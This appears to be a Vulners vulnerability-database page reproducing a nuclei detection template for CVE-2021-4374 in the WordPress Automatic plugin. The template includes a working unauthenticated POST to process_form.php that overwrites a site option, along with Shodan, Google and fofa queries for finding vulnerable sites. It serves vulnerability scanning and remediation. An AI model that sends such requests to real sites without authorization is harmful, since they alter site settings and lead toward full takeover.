Lucene search
K

WordPress Automatic Plugin - Unauthenticated Options Change

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

Unauthenticated users can change options via process_form.php in WordPress Automatic Plugin (3.53.2 and below), potentially creating admin accounts.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Missing Authorization in Valvepress Wordpress_Automatic_Plugin
9 Nov 202523:01
githubexploit
Circl
CVE-2021-4374
5 Nov 202112:13
circl
CNNVD
WordPress Plugin WordPress Automatic 安全漏洞
7 Jun 202300:00
cnnvd
CVE
CVE-2021-4374
7 Jun 202301:51
cve
Cvelist
CVE-2021-4374 WordPress Automatic Plugin <= 3.53.2 - Unauthenticated Arbitrary Options Update
7 Jun 202301:51
cvelist
EUVD
EUVD-2021-34201
3 Oct 202520:07
euvd
Metasploit
WordPress Plugin Automatic Config Change to RCE
5 Nov 202117:43
metasploit
NVD
CVE-2021-4374
7 Jun 202302:15
nvd
OSV
CVE-2021-4374
7 Jun 202302:15
osv
Prion
Authorization
7 Jun 202302:15
prion
Rows per page
id: CVE-2021-4374

info:
  name: WordPress Automatic Plugin - Unauthenticated Options Change
  author: intelligent-ears
  severity: critical
  description: |
    WordPress Automatic Plugin (versions 3.53.2 and below) contains a critical vulnerability that allows unauthenticated users to change arbitrary WordPress options through the process_form.php script. The vulnerable script uses update_option() on all POST parameters without authentication or capability checks, allowing attackers to create administrator accounts or modify critical settings. The vulnerability can be exploited even if the plugin is deactivated as it's a standalone script.
  impact: |
    Unauthenticated attackers can update arbitrary WordPress options via process_form.php, enabling them to create administrator accounts, modify critical settings, or completely compromise the WordPress site.
  remediation: |
    Upgrade to WordPress Automatic Plugin version 3.53.3 or later, or deactivate and delete the plugin.
  reference:
    - "https://www.wordfence.com/blog/2021/09/critical-vulnerability-fixed-in-wordpress-automatic-plugin/"
    - "https://nvd.nist.gov/vuln/detail/CVE-2021-4374"
  classification:
    cve-id: CVE-2021-4374
    epss-score: 0.16408
    epss-percentile: 0.96594
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-862
    cpe: cpe:2.3:a:valvepress:wordpress_automatic_plugin:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: valvepress
    product: wp-automatic
    fofa-query: "wp-content/plugins/wp-automatic/"
    google-query: inurl:"/wp-content/plugins/wp-automatic/"
    shodan-query: 'http.html:"wp-content/plugins/wp-automatic/"'
  tags: cve,cve2021,wp,wordpress,wp-plugin,wp-automatic,unauth,intrusive,vkev

http:
  - raw:
      - |
        POST /wp-content/plugins/wp-automatic/process_form.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        field1={{randstr}}&field3=test&field4=test&field5=test&field6=test&blogdescription={{randstr}}

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{randstr}}'

      - type: status
        status:
          - 200
# digest: 490a0046304402207a884377c601af08d4094559b8b6d9700acd7c7334ae4da3b6514d734d5bc93d0220655dc1648b3a7a14f9a03f5c21c8a1f18ae154edfe8e908f378a1a295c3b5c1f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.1 - 9.8
EPSS0.16408
SSVC
21